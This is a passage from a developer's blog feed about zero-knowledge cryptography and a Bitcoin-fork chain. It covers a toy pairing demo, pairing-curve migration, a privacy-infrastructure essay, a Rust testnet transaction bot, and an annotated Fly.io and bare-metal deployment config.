    "/index.ts": `// Toy "pairing" demonstration over a tiny modular group.
// This is NOT a real pairing — there is no curve here, no Miller loop,
// no final exponentiation. It demonstrates the algebraic SHAPE of
// bilinearity: e(aP, bQ) == e(P, Q)^{ab}.
//
// For real BN254 / BLS12-381 pairings, use arkworks or blst.

const Q = (1n << 31n) - 1n; // small Mersenne prime
const G = 7n;               // a generator of the multiplicative group
const ORD = Q - 1n;         // group order = Q-1 since Q prime

function modpow(a: bigint, e: bigint, m: bigint): bigint {
  let r = 1n, base = a % m, exp = e;
  while (exp > 0n) {
    if (exp & 1n) r = (r * base) % m;
    base = (base * base) % m;
    exp >>= 1n;
  }
  return r;
}

// "G_1" and "G_2" are both the same multiplicative group here for the
// demo. In real pairing curves they're DIFFERENT EC subgroups.
function scalarMul(P: bigint, k: bigint): bigint {
  return modpow(P, k, Q);
}

// "Pairing": e(P, Q) = (P^Q) -- not real, just a synthetic bilinear map.
// Real pairings are far more involved; this is the algebra.
function pair(P: bigint, R: bigint): bigint {
  // We model e(g^a, g^b) = g^{ab} by pairing exponents.
  // Recover a, b via baby-step (only feasible because Q is tiny).
  const a = babyStepGiantStep(P);
  const b = babyStepGiantStep(R);
  return modpow(G, (a * b) % ORD, Q);
}

function babyStepGiantStep(target: bigint): bigint {
  // tiny demo helper — fine for Q ~ 2^31.
  const m = 1n << 16n;
  const table = new Map<string, bigint>();
  let cur = 1n;
  for (let j = 0n; j < m; j++) { table.set(cur.toString(), j); cur = (cur * G) % Q; }
  const factor = modpow(modpow(G, m, Q), ORD - 1n, Q); // G^{-m}
  let gamma = target;
  for (let i = 0n; i < m; i++) {
    const hit = table.get(gamma.toString());
    if (hit !== undefined) return (i * m + hit) % ORD;
    gamma = (gamma * factor) % Q;
  }
  throw new Error("no log");
}

(async () => {
  const out = document.getElementById("out")!;
  const lines: string[] = [];

  const a = 17n, b = 23n;
  const P = scalarMul(G, a);
  const R = scalarMul(G, b);

  // Direct: e(P, R)
  const direct = pair(P, R);
  // Bilinear factor: e(G, G)^{ab}
  const eGG = pair(G, G);
  const expected = modpow(eGG, (a * b) % ORD, Q);

  lines.push(\`a = \${a}, b = \${b}\`);
  lines.push(\`P = G^a = \${P}\`);
  lines.push(\`R = G^b = \${R}\`);
  lines.push(\`e(P, R)         = \${direct}\`);
  lines.push(\`e(G, G)^{ab}    = \${expected}\`);
  lines.push(\`bilinear holds: \${direct === expected}\`);

  // Try with mismatched scalars to confirm the structure.
  const P2 = scalarMul(G, 5n);
  const R2 = scalarMul(G, 11n);
  lines.push("");
  lines.push(\`e(G^5, G^11)    = \${pair(P2, R2)}\`);
  lines.push(\`e(G, G)^{55}    = \${modpow(eGG, 55n, Q)}\`);

  out.textContent = lines.join("\\n");
})();
`,
    "/index.html": `<!DOCTYPE html>
<html>
  <body>
    <pre id="out" style="font-family: 'Geist Mono', ui-monospace, monospace; padding: 1rem; background: #0a0a0a; color: #4ade80; line-height: 1.6;">running...</pre>
    <script type="module" src="/index.ts"></script>
  </body>
</html>`,
  }}
/>

The Rust shape of a real pairing — using [arkworks](https://github.com/arkworks-rs) — is much closer to a one-liner once the curve is in scope:

<RustPlayground edition="2024" title="bilinearity (skeleton)">
{`// Skeleton showing how arkworks expresses bilinearity. Won't compile here
// without the ark-bn254 / ark-ec deps; this is the SHAPE of the production
// code in zera-sdk-core/src/pairing.rs.

// use ark_bn254::{Bn254, Fr, G1Affine, G2Affine};
// use ark_ec::{pairing::Pairing, PrimeGroup};

fn main() {
    // let g1 = G1Affine::generator();
    // let g2 = G2Affine::generator();
    // let a = Fr::from(17u64);
    // let b = Fr::from(23u64);
    //
    // let p1 = (g1 * a).into();
    // let q1 = (g2 * b).into();
    //
    // let lhs = Bn254::pairing(p1, q1);
    // let rhs = Bn254::pairing(g1, g2).pow(&[(a * b).into_bigint().0[0]]);
    //
    // assert_eq!(lhs, rhs); // bilinearity
    //
    // The whole Groth16 verifier reduces to a constant number of these
    // pairings — three for Groth16, plus a multi-pairing-product check.
    println!("see crates/zera-sdk-core/src/pairing.rs for the real code");
}
`}
</RustPlayground>

The real implementation lives in [arkworks-rs/algebra](https://github.com/arkworks-rs/algebra) and [supranational/blst](https://github.com/supranational/blst). The latter is what production Ethereum and Solana ZK code links against — `blst` is the BLS12-381 pairing library written by Pierre-Yves Strub and Sergey Vasilyev, audited, and with constant-time multi-scalar multiplication that beats anything else in the open source.

## What changes if we move to BLS12-381

The migration cost is not the curve. The migration cost is everything that touches the curve.

1. **Re-run the trusted setup.** Groth16 needs a per-circuit setup. Migrating to BLS12-381 means a fresh ceremony for every circuit. That is non-trivial — a Powers-of-Tau ceremony runs for months — but it is also not blocked on cryptography.
2. **Regenerate the verifying keys.** Every on-chain verifier ships a verifying key (a few KB of curve points). Those have to be regenerated and re-deployed. On Solana, that's a program upgrade. On Ethereum, that's a fresh contract deploy.
3. **Update every prover.** snarkjs, rapidsnark, the Rust prover in [zera-sdk-core](https://github.com/Dax911/zera-sdk) — all of them. The `ff` and `pairing` crate ecosystem in Rust is curve-generic, so this is an `ark-bn254` → `ark-bls12-381` swap and a recompile. The TypeScript side is harder because circomlibjs is BN254-pinned in places.
4. **Eat the verifier-cost hit.** A BLS12-381 pairing is roughly 50% more expensive than BN254. On Solana that's 1500 extra compute units per pairing-based verification. Multiplied by the four pairings in a typical multi-input transfer proof, that's 6000 CUs — meaningful but absorbable.

We've scoped this work for [zera-sdk](/blog/zera_sdk_scaffolding/) v2 but not yet committed to a date. The bet is: BN254 carries us through 2027 deployments comfortably, and the BLS12-381 migration is a clean lift the moment the broader Solana ecosystem standardises on it (the `alt_bls12_381_*` syscalls have been in cargo-audit feature flags since 2025).

<Aside kind="warn">
"Re-run the trusted setup" sounds simple. It is not. A circuit-specific ceremony for a non-trivial circuit (transfer with two inputs, two outputs, range checks, Merkle paths) takes months to coordinate, and a botched ceremony silently inserts a backdoor. This is the part that keeps me from rushing the migration.
</Aside>

## Where this lands in the stack

In `crates/zera-sdk-core/src/curve.rs` the curve is a single type alias:

```rust
// Currently:
pub type Curve = ark_bn254::Bn254;
pub type Fr = ark_bn254::Fr;
pub type G1 = ark_bn254::G1Affine;
pub type G2 = ark_bn254::G2Affine;

// Future:
// pub type Curve = ark_bls12_381::Bls12_381;
// pub type Fr = ark_bls12_381::Fr;
// ...etc
```

The whole SDK reads from `Curve`, `Fr`, `G1`, `G2`. The migration is a four-line swap and a re-ceremony. The cleanliness is on purpose — see [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) for why we boxed the curve choice the way we did.

What I tell people who ask "should I deploy on BN254 or BLS12-381?": deploy on BN254 if you need to compose with the Ethereum precompile or the Solana `alt_bn128_*` syscall *today*, deploy on BLS12-381 if you don't and you want the security headroom. The math is the math. The deployment surface is what makes the call.

## Further reading

- [Updating Key Size Estimations for Pairings](https://eprint.iacr.org/2017/334) — Barbulescu, Duquesne (Journal of Cryptology 2019) — the post-exTNFS security recompute.
- [Extended Tower Number Field Sieve: A New Complexity for the Medium Prime Case](https://eprint.iacr.org/2015/1027) — Kim, Barbulescu (CRYPTO 2016) — the attack that dropped BN254's security.
- [Pairing-Friendly Curves (IETF CFRG draft)](https://datatracker.ietf.org/doc/draft-irtf-cfrg-pairing-friendly-curves/) — the standardisation path.
- [BLS12-381 For The Rest Of Us](https://hackmd.io/@benjaminion/bls12-381) — Ben Edgington's accessible explainer.
- [arkworks-rs/algebra](https://github.com/arkworks-rs/algebra) — the curve-generic Rust implementation we use.
- [supranational/blst](https://github.com/supranational/blst) — the production BLS12-381 library.
- [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — the sister piece on what we commit *with*.
- [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/) — the hash that lives inside circuits over the same curve.


---

# Privacy's broadband moment

Canonical: https://blog.skill-issue.dev/blog/privacys_broadband_moment/
Description: ZK got fast, hardware got attestable, AI agents started carrying their own wallets, and regulators stopped trying to ban math. Four curves crossed and privacy stopped being a research topic — it became infrastructure.
Published: 2026-04-15T08:00:00.000Z
Tags: zera, zk, cryptography, strategy, founders


There is a phrase we keep using internally at [Zera Labs](https://zeralabs.org): *privacy's broadband moment.* It started as a slide-deck line, the kind of thing you put in front of an investor to explain why a fifteen-year-old idea is suddenly a 2026 product. After a year of saying it I realised it is also the most precise description I have for what is actually happening in the cryptography stack right now.

Broadband did not arrive because someone invented broadband. It arrived because **four unrelated curves crossed at the same time**: fibre got cheap, video codecs got good, last-mile rights-of-way got resolved, and people stopped thinking of "the internet" as a separate thing they used at a desk. None of those four was sufficient. All four together were inevitable.

Zero-knowledge cryptography is having the same moment. I want to lay out the four curves I see, one at a time, and then say what we are doing about it.

## Curve 1 — proof systems finally got fast

For most of the last decade, "fast ZK" meant Groth16 over BN254 with a trusted setup and proving times measured in seconds for circuits that did anything useful. That was good enough for academic papers and bad enough for products. People shipped in spite of it. Tornado Cash circuits took four-plus seconds to prove on a laptop in 2020. That is not a consumer experience; that is a research demo.

The thing that actually changed in 2024 and 2025 is the boring thing: **hash-friendly arithmetisation went mainstream.** Poseidon (and the Poseidon-2 successor) went from a "cool paper at SAC 2019" to the default ZK-friendly hash inside almost every modern proof system. Once you have a hash that costs ~250 constraints per permutation instead of the ~24,000 that SHA-256 takes inside a SNARK, the entire calculus of "what circuits are practical to prove on a phone" inverts.

The [`zera-sdk` Rust core](https://github.com/Dax911/zera-sdk) ships Poseidon as the only commitment hash. We did not invent that decision; we inherited it. Every serious privacy pool in 2026 made the same call. The reason ZERA can talk about *unified* shielding — one pool that holds USDC and USDT and SOL and `$ZERA` and a dozen other tokens at once — is that the per-note proof cost finally dropped below the threshold where wallet UX would tolerate it.

I wrote about how this looks at the metal level in [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) and [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/). Short version: the production implementation is six lines of code per primitive, and the line of code that made it six lines instead of six hundred is the choice of Poseidon.

## Curve 2 — hardware attestation stopped being theatre

The second curve is the one nobody likes to talk about because it sounds like 2014 trusted-execution marketing. But it is real now in a way that it was not.

Apple's Secure Enclave shipped in 2013. For a decade it was a place you stored your fingerprint hash and your Apple Pay tokens. In 2026 it is a place you can ship cryptographic primitives that the OS itself cannot read or steal, *with attested provenance.* Pixel devices have Titan M2. Modern AMD chips have SEV-SNP. ARM TrustZone is everywhere. The attestation chains are documented, the developer APIs are stable enough to build against, and — critically — the *threat model* for what a TEE actually buys you stopped being aspirational.

This matters for the [True Offline Payments](https://zeralabs.org/#features) pillar of ZERA in a way that is hard to overstate. "Offline P2P payments" without a hardware trust anchor is a euphemism for "double-spend forever." With one, it is a sequence-numbered key-attested signature over a note that the rest of the network can verify when they reconcile. The cryptography is the easy part. The cryptography has been ready for a long time. What was not ready until very recently was the assumption that the user has a real TEE in their pocket and that we can tell whether they do.

[Foundry Digital taught me to think like an operator](/blog/what_running_a_bitcoin_mine_taught_me/) — the hardware *is* the system. ZERA Hardware exists for the same reason mining ASICs exist: when the math is fixed and the silicon is differentiated, infrastructure is where the next decade of value lands.

## Curve 3 — AI agents grew wallets

The third curve is the one I genuinely did not see coming until late 2025.

Coinbase shipped [x402](https://www.coinbase.com/developer-platform/discover/protocols/x402) — a stablecoin-payment protocol over HTTP — and the AI agent ecosystem absorbed it within a quarter. Anthropic's MCP standard went from "interesting Anthropic side project" to "ten thousand public servers, ninety-seven million SDK downloads a month" in the same window. Two things that should not have collided collided: **autonomous AI agents now carry their own wallets**, and the protocols they use to pay each other are running on stablecoin rails.

The implication for privacy is not subtle. An autonomous agent that buys a search result for `0.001 USDC` is making a transaction that — under any current rail — is permanently legible to anyone watching the chain. If your agent buys ten thousand search results across an afternoon while it does research for you, the sum of those transactions is a *behavioural signature* of you. Not your agent. *You.* Because the agent is acting on your instructions.

This is the use-case that turned privacy from "a thing crypto people argue about on Twitter" into "a thing every AI platform team will be procuring by Q4." There is no version of an autonomous-agent economy that is also a transparent-by-default payments graph. Either agents acquire privacy primitives, or agents stop being economically rational to operate at scale. We are betting that the first thing happens.

I wrote the threat-model framing for this earlier in the year — see the post on the [x402 honeypot research artifact](/blog/x402_honeypot_disclosure/) for why this is a 2026 problem and not a 2028 one.

## Curve 4 — the regulatory weather changed

I do not love writing about regulation. I will keep this short.

For most of the last decade, "we are building privacy infrastructure" was a sentence you said at a developer conference in Berlin and not at a meeting at the SEC. The Tornado Cash sanctions in 2022, the chilling effect on Nym and Aztec, the post-FTX legislative panic — all of it pushed serious privacy work either offshore or underground.

Two things shifted that. First, the [district court ruling overturning the Tornado Cash sanctions](https://www.fifthcircuit.gov/) in late 2024 re-established that *immutable code is not a sanctioned entity*. Second, the broader 2025-2026 stablecoin clarity work in the US, EU MiCA implementation, and the Hong Kong VASP regime made it possible for compliant venues to handle privacy assets the way they handle any other asset class — with KYC at the edges and pseudonymity in the middle.

ZERA is built **token-agnostic, chain-agnostic, and compliance-aware.** The pool holds USDC. USDC has a freeze function. We do not pretend it does not. The interesting design question stops being "how do we build a system that defies the regulator" and becomes "how do we build a system the regulator can verify *without* the regulator becoming a panopticon." The answer to that question is zero-knowledge. The reason the answer is finally usable is that curves one through three made it cheap.

## What we are doing about it

Four curves crossing is necessary but not sufficient. Someone has to actually ship the thing.

That is what Zera Labs is for. Concretely:

- **One unified shielded pool** instead of one per asset class. The pool is built on Solana for the [account-compression-driven cost model](/blog/zeraswap_compressed_amm/) — Light Protocol's compressed accounts let us amortise the per-note state cost down to something that works at consumer-payment scale.
- **A wallet that does not assume you are sitting at a desk.** [Zera Wallet](https://wallet.zeralabs.org) targets desktop, iOS, and Android *with the same primitives* — the offline-P2P story is real and is the reason we keep saying "digital cash" instead of "private DeFi."
- **An SDK with an MCP server in the box.** Every modern privacy primitive should be callable by an AI agent under a verifiable policy. We made that the default rather than the afterthought. See [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/).
- **A research line that publishes.** I am doing a [PhD by publication](/about) in zero-knowledge proof systems while running the company. Every paper has a corresponding production component. Every production component has a paper that would not embarrass me in a peer-review queue.

## The thing I keep telling people

You can be early to the right idea by a decade and watch the wave roll in without you. The question is never "is this the future?" The question is "did the four curves cross *yet*?"

Privacy's four curves crossed in 2026. The next ten years are infrastructure-build. We are going to be a stupid fraction of that infrastructure or none of it, and either way the wave is happening.

If that sounds like the kind of thing you want to be in the middle of, [my calendar is open](https://cal.com/daxts).

## Further reading

- [zeralabs.org](https://zeralabs.org) — product surface
- [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/)
- [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/)
- [Why I started Zera Labs](/blog/why_i_started_zera_labs/)
- [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/)
- [What running a Bitcoin mine taught me about cloud margins](/blog/what_running_a_bitcoin_mine_taught_me/)
- Grassi et al., *Poseidon: A New Hash Function for Zero-Knowledge Proof Systems* (USENIX Security 2021)
- Anthropic, *Model Context Protocol Specification* (2025-11-25)


---

# Generating mempool with a Rust txbot

Canonical: https://blog.skill-issue.dev/blog/vanta_txbot_synthetic_mempool/
Description: Empty blocks lie. A new chain whose miners are mining empty templates is not exercising any of the code that fails in production. The txbot is a 200-line Rust loop that round-robins coins through 114 addresses to keep mempool honest.
Published: 2026-04-13T17:39:39.000Z
Tags: vanta, rust, txbot, mempool, testnet


There is a class of bug in a Bitcoin-style chain that you only ever see when the mempool is non-trivially full. Fee-rate accounting, RBF replacement, package relay, mempool eviction policies — all of it is only ever stressed by *real spend pressure*. A new chain whose miners are mining empty templates against an empty mempool is, by definition, not exercising any of that code. So you ship a transaction bot.

The Vanta txbot is [`txbot/src/main.rs`](https://github.com/Dax911/vanta/blob/main/txbot/src/main.rs), a 200-line Rust loop that round-robins random spends across 114 pre-funded Z-addresses on the testnet wallet. This post is a tour of what it does, what it found, and why the synthetic-load approach is non-negotiable when you're bringing up an L1.

## The problem statement

In April 2026 I had a chain that worked. Bitaxes were finding blocks, the explorer was rendering them, the wallet was sending and receiving. There were also days where the mempool depth was zero for hours at a time, because the only people transacting were me, and I sleep.

A pre-mainnet chain that produces empty blocks is *less debugged* than one with mempool pressure. Things you don't notice when blocks are empty:

- Fee estimation has nothing to estimate against and falls through to `fallbackfee`.
- Coin selection is trivial when there are 12 UTXOs in the wallet. With 1,000 UTXOs across 114 addresses, you start hitting `bnb`-vs-knapsack edge cases.
- Block-template construction never sees competition between transactions. Every fee policy is moot.
- The mempool's eviction policy, ancestor/descendant limits, and policy-vs-consensus split — all untested.

The fix isn't "wait for users." Users come *after* the chain is debugged. The fix is to ship synthetic load and let the chain talk to itself.

## The bot in 200 lines

The configuration up top sets the spend envelope:

```rust
const MAX_SPEND_RATIO: f64 = 0.40;
const MIN_SPEND_RATIO: f64 = 0.05;
const MAX_OUTPUTS: usize = 12;
const MIN_DELAY_MS: u64 = 200;
const MAX_DELAY_MS: u64 = 2000;
```

Every round, the bot picks a random fraction of its current balance between 5% and 40%, splits it into 1–12 random output amounts, picks 1–12 destination addresses uniformly from the address pool, and sends. Then sleeps a random 200ms–2000ms and goes again.

The address pool is hardcoded inline as a `&[&str]` of 114 Z-prefix addresses. They're real addresses owned by the testnet wallet (the bot is running against the wallet RPC), so coins keep round-robining through the same wallet — never net leaving, just churning.

The spend loop is the simplest thing that works:

```rust
loop {
    round += 1;

    let balance = match get_balance(&rpc) { Ok(b) => b, ... };
    if balance < 1.0 {
        std::thread::sleep(Duration::from_secs(10));
        continue;
    }

    let spend_ratio = rng.gen_range(MIN_SPEND_RATIO..=MAX_SPEND_RATIO);
    let total_spend = balance * spend_ratio;
    let num_outputs = rng.gen_range(1..=MAX_OUTPUTS);
    let amounts = random_split(&mut rng, total_spend, num_outputs);

    // ... send each output via sendtoaddress, log txid

    let delay = rng.gen_range(MIN_DELAY_MS..=MAX_DELAY_MS);
    std::thread::sleep(Duration::from_millis(delay));
}
```

`random_split` divides the total spend into `n` pieces by sampling `n-1` uniformly random cut points. This produces uneven splits — most outputs are small, a couple are medium, occasionally one is large. That distribution is *closer to organic spending* than equal splits would be, and it stresses coin selection harder.

`sendtoaddress` is called once per output rather than once per `n`-output transaction. This was a deliberate choice: it produces more transactions per round (which is the point), and it lets the chain pick how it batches them in mempool selection.

## What it actually exercised

The bot ran for weeks against the Latitude testnet. Things it surfaced:

**Fee estimation falls through.** The first time the bot sent a transaction the call returned `"Fee estimation failed."` The fix was the now-canonical `settxfee` at startup with a 0.0001 fallback. Same line is in the [Axum web wallet's main.rs](/blog/vanta_wallet_axum_api/) for the same reason.

**Wallet RPC contention.** When the bot rate is high, multiple `sendtoaddress` calls in flight contend on the wallet's lock. The bot is single-threaded so it's only contending against itself plus whatever else uses the wallet (the web UI, occasional manual sends). The lesson: if you're going to run the bot at high rate, give it a dedicated wallet via `loadwallet`.

**Mempool eviction.** With the bot churning 5–10 transactions per round and a 1-minute block time, mempool depth would creep up during slow blocks and drain on fast blocks. This was the first time I watched the eviction policy actually run. It's *fine* — Bitcoin Core's mempool is one of the most-tested pieces of state in the codebase — but watching it from the outside helped me build a model of how it behaves at our parameters (1-min blocks, 100k subsidy, low fee floor).

**Pool L2 retry queue.** The 2026-04-13 commit `ops: vanta-node systemd unit + docker compose + pool L2 retry queue` landed a feature where the [Stratum server's L2 submission](https://github.com/Dax911/vanta/blob/main/pool/stratum_server.py) is enqueued for retry when the L2 sidecar is unreachable. We discovered the need for that retry queue because the txbot was generating enough block-finding pressure that the pool was sometimes hitting `submitblock` while the L2 sidecar was being restarted. Without the retry queue, those blocks' encrypted notes would be lost. With it, they get replayed when the L2 comes back.

That's the synthetic-load test paying for itself in a feature that ended up in the production pool code.

## Things the bot is *not* designed to be

The bot is a stress generator, not a fuzzer. It does not:

- Construct invalid transactions to test rejection paths. (That's the functional tests in `test/`.)
- Try to double-spend. (The wallet won't let it; the chain wouldn't accept it.)
- Generate shielded transactions. (No SP1 prover in the bot loop. Yet.)
- Negotiate fees adversarially. (Single fixed fallback fee.)

I have *thought* about adding all of these. The shielded-transaction one is the interesting next step. A txbot that includes some fraction of shielded sends would exercise the SMT growth path, the nullifier-set growth path, and the encrypted-note inbox at `vanta-node` — all of which currently only get exercised by manual sends from the wallet.

Adding ZK proof generation to the bot loop is the trade-off though. SP1 proofs take 30–60 seconds on CPU, so a bot that does 10 sends per minute can't be all-shielded. **TODO: Dax confirm whether we want a `--shielded-ratio 0.2` flag to mix.**

## Why not synthetic at the protocol level

A reasonable counter-design: instead of running a separate bot, make `vantad` itself emit synthetic transactions in a `regtest`-only mode.

Two reasons we didn't:

1. **The bot is real.** Every transaction the bot sends is signed by a real key, broadcast through real RPC, and validated by real consensus. It exercises the same code paths a user transaction would. A built-in synthetic mode is cheaper but it is at risk of taking shortcuts that a real RPC client wouldn't take.
2. **Operational separation.** The bot is a thing I can stop, restart, retarget, or add features to without touching `vantad`. That separation matters; the consensus binary should not contain test-traffic-generation code.

The bot lives in `txbot/`, separate Cargo workspace, separate binary. The cost of that separation is a few extra lines of `bitcoincore-rpc` setup. The benefit is that I can iterate on the bot during a deploy without rebuilding the chain.

## What I would change

A list, in order of priority:

1. **Multiple workers.** A single-threaded bot maxes out around 10 tx/sec because of RPC round-trip latency. A 4-worker version with a shared rng seed would 4x the rate without changing the workload shape. Easy.
2. **Shielded mix.** As above. Adds the SP1 dependency and an L2-sidecar URL to the bot's config; cost is per-tx latency.
3. **Adversarial replacement.** Send a tx, then send a higher-fee replacement before the first confirms. Tests RBF policy. Easy.
4. **Mempool snapshot logging.** After each send, query `getmempoolinfo` and `getmempoolancestors` for the txid. Log the mempool depth and ancestor count. This produces a time series I can graph against block-find events to see how mempool pressure correlates with confirmation latency. Low priority.

The bot is also *load-bearing for the explorer*. The 2026-04-13 commit `explorer: privacy throughput + anonymity charts (recharts)` shows transaction-count and mempool-depth charts on the explorer dashboard; those charts are flat without the bot running.

## Further reading

- [`txbot/src/main.rs`](https://github.com/Dax911/vanta/blob/main/txbot/src/main.rs) — the entire bot in one file
- [`txbot/Cargo.toml`](https://github.com/Dax911/vanta/blob/main/txbot/Cargo.toml) — dependency-light by design
- [The vanta wallet HTTP API](/blog/vanta_wallet_axum_api/) — sister piece on the Axum wallet that talks to the same RPC
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the chain the bot is exercising
- [Mining VANTA with a Bitaxe BM1368](/blog/mining_vanta_with_a_bitaxe/) — the hardware that consumes the bot's mempool pressure
- [Bitcoin Core mempool docs](https://github.com/bitcoin/bitcoin/blob/master/doc/policy/mempool-replacements.md) — the policy surface the bot indirectly tests


---

# Latitude bare-metal primary, Fly.io backup: the deploy story for a 1-min-block chain

Canonical: https://blog.skill-issue.dev/blog/vanta_flytoml_latitude_baremetal/
Description: Vanta v1 went LIVE on a Latitude bare-metal box at 64.34.82.145:9333 with a Fly.io seed fleet as auto-failover. Why a 1-min-block chain hates cold starts, what the fly.toml has to say about it, and the cost math that picks bare metal.
Published: 2026-04-13T21:18:29.000Z
Tags: vanta, deploy, latitude, fly, baremetal, infra


The 2026-04-13 commit `d3d532cc deploy: vanta v1 LIVE on Latitude` is the moment Vanta moved from "regtest on a Mac mini under my desk" to "mainnet on a real-world internet host." The seed node IP — `64.34.82.145:9333` — has been the bootstrap addnode in the [desktop wallet's auto-config](/blog/vanta_tauri_ergonomics/) since that commit.

What the commit message doesn't tell you is that there's a *second* deploy target. The `fly.toml` in the repo declares an 11-region fleet on Fly.io, hardcoded to an old `zeracoin-seed` app name. That fleet is the *backup* — the failover that the network falls back to when the bare-metal box goes down. Bare metal is primary. Fly is the safety net.

This post is the architecture, the fly.toml walk-through, the cost math that makes bare metal cheaper than equivalent Fly machines, and a candid paragraph about why a 1-minute-block chain particularly hates cold starts.

## The two-tier topology

There's a single primary bare-metal box, and a fleet of small Fly machines. The wallet's auto-config lists *both* IPs for redundancy:

```
addnode=64.34.82.145:9333    # Latitude bare metal — primary
addnode=66.241.124.138:9333  # Fly.io fleet — backup
```

The bitcoind P2P protocol picks whichever it can reach first and rotates if a peer disappears. There's nothing fancy here — Bitcoin Core's peer discovery does the work. The architecture is "primary host, secondary host, network sorts itself out."

The reason for two tiers (and not just two bare-metal boxes, or just a Fly fleet) is *operational*. Bare metal is cheap when you can give it your full attention. Bare metal is brittle when you can't — disk failures happen, ISPs renumber, hardware ages. The Fly fleet is the "I am asleep, the chain stays up" insurance.

## fly.toml, annotated

The full [`fly.toml`](https://github.com/Dax911/vanta/blob/main/fly.toml) is short. The interesting parts are below.

### App name: the rebrand artefact

```toml
app = "zeracoin-seed"
primary_region = "iad"
```

The Fly app is *still* named `zeracoin-seed` — the pre-rebrand name. Renaming a Fly app requires recreating it (you lose the IPs and volumes), and the IPs are baked into the desktop wallet's `addnode` lines. Recreating the app would force a wallet upgrade for every existing user.

The fix lives in commit [`1b72aec6`](https://github.com/Dax911/vanta/commit/1b72aec6c) — `fly: match actual app name (zeracoin-seed) + clamp grace_period` — which is the moment I committed to the rebrand-postponement and updated the deploy script to match the actual app name instead of pretending we'd already migrated. The tradeoff is: ugly artefact in `fly.toml` vs. forcing a migration every existing user has to participate in. The artefact wins.

### Kill signal and timeout

```toml
kill_signal = "SIGTERM"
kill_timeout = "120s"
```

Bitcoin Core flushes its database on shutdown. Get SIGKILL'd mid-flush and you can corrupt chainstate or block files. The 2-minute `kill_timeout` is the window we give Fly's orchestrator to wait before escalating; in practice `vantad` flushes in 10–20 seconds, so 120 is generous insurance.

Fly defaults to a 5-second `kill_timeout`. Five seconds is not enough to flush a UTXO database, full stop. Every Bitcoin-Core deploy I've seen on Fly that didn't override this had at least one chainstate-corruption incident. **Override it.**

### Volumes

```toml
[mounts]
  source = "vanta_data"
  destination = "/root/.vanta"
```

A persistent volume mounted at `~/.vanta` — the Bitcoin Core data dir. Fly creates one volume per machine (the volume names get auto-numbered: `vanta_data`, `vanta_data_v2`, etc). The volume survives machine restarts; only a `fly volumes destroy` deletes it.

The data dir contains chainstate, blocks, the mempool, the peers cache, and the wallet (if any). On a fresh deploy this is empty and the machine does an initial-block-download from peers; on a restart it picks up where it left off. The volume is what makes "restart a machine" cheap and "destroy a machine" expensive.

### Rolling deploy strategy

```toml
[deploy]
  strategy = "rolling"
  max_unavailable = 0.25
  wait_timeout = "10m"
```

Rolling deploys take at most 25% of the fleet down at once. With 11 machines spread across 11 regions, that's about 3 machines unavailable during any given deploy. The other 8 keep the network reachable for the wallet's `addnode` lookups.

`wait_timeout = "10m"` gives each machine ten minutes to come back up and pass health checks before the deploy considers it failed. Bitcoin Core sometimes takes that long to verify chainstate at startup, especially on a small machine; default Fly wait_timeout (5m) was tripping us during deploys and leaving the cluster in a partially-deployed state.

### Health checks

```toml
[[services]]
  internal_port = 9333
  protocol = "tcp"
  auto_stop_machines = false
  auto_start_machines = true

  [[services.ports]]
    port = 9333

  [[services.tcp_checks]]
    interval = "30s"
    timeout = "5s"
    grace_period = "1m"
```

`auto_stop_machines = false` is intentional. Fly's autostop will spin a machine down after a few minutes of no traffic. A *seed node* with no traffic is suspicious, but it's not "stop the machine" suspicious — peer discovery is bursty, and a seed that's stopped when a wallet starts up is a seed that's not doing its job.

`auto_start_machines = true` lets Fly *start* a stopped machine on a cold tcp connection. This is the safety net for any case where the autostop did fire.

`tcp_checks` is a 30-second TCP-handshake probe against port 9333. If `vantad` dies or wedges, its P2P listener goes away, the TCP check fails, and Fly restarts the machine. The `grace_period = "1m"` is the startup window where we don't penalise a machine for being mid-IBD.

`grace_period` is capped at 1m by Fly — anything higher gets clamped, which is a thing I learned by setting it to 5m and watching the deploy log it as "1m (clamped)." The 1-minute window is enough for a warm restart but not enough for a cold IBD; we work around it by not destroying machines casually.

### Sizing

```toml
[vm]
  size = "shared-cpu-1x"
  memory = "2gb"
  swap_size_mb = 1024
```

`shared-cpu-1x` is Fly's smallest paid tier. 2 GB RAM is bumped from the default 1 GB because `txindex=1` plus the UTXO set needs headroom on a Vanta-sized chain. 1 GB swap is insurance against OOM kills during IBD bursts (specifically: the moment when the UTXO set is being loaded into memory at startup).

This is sized for a *seed* node, not a *miner* node. We don't run mining workloads on Fly. The Bitaxe rig at home is the [actual mining setup](/blog/mining_vanta_with_a_bitaxe/).

## The Latitude box

The bare-metal primary is on [Latitude.sh](https://latitude.sh) (formerly Latitude.net), a smaller-than-OVH-but-bigger-than-Hetzner bare-metal provider with hourly billing. The spec is a single AMD Ryzen 9, 32 GB ECC RAM, 1 TB NVMe, with a /29 subnet and an unmetered 1 Gbps port. **TODO: Dax confirm the exact tier — I have it as `c2.medium.x86` but want to verify against the Latitude billing dashboard.**

What it runs:

- `vantad` — the L1 node, listening on port 9333 (P2P) and 9332 (RPC, bound to localhost).
- `vanta-node` — the L2 sidecar, listening on port 9380 for the REST API.
- `nginx` — TLS termination for the L2 REST API (port 443 → 9380).
- The Bitaxe pool (port 3333) — the home rig actually plugs into a separate machine, but the *pool stratum server* lives on the Latitude box.
- The vanta-explorer (port 80 → 8080) — block explorer.
- The fly-deploy mirror — a backup of the Fly fleet's deploy state, in case Fly itself goes down for an extended period.

This is more than a "seed node." It's the primary operational deploy of the chain. The Fly fleet is, again, the *seed fallback* — they don't run the explorer or the L2 sidecar. They just keep the P2P network reachable.

## Why a 1-minute-block chain hates cold starts

Worth dwelling on this. On Bitcoin (10-minute blocks), a node that's been off for an hour comes back up and is six blocks behind. Catching up is fast. The chain's "average" block production rate is generous enough that a 60-second startup delay is invisible.

On Vanta (1-minute blocks), an hour off is sixty blocks behind. A 60-second startup is *one full block of latency*. If the seed nodes are slow to come back up, wallet UX degrades visibly: the user opens the wallet, sees "syncing," and waits sixty seconds where Bitcoin would have synced in ten.

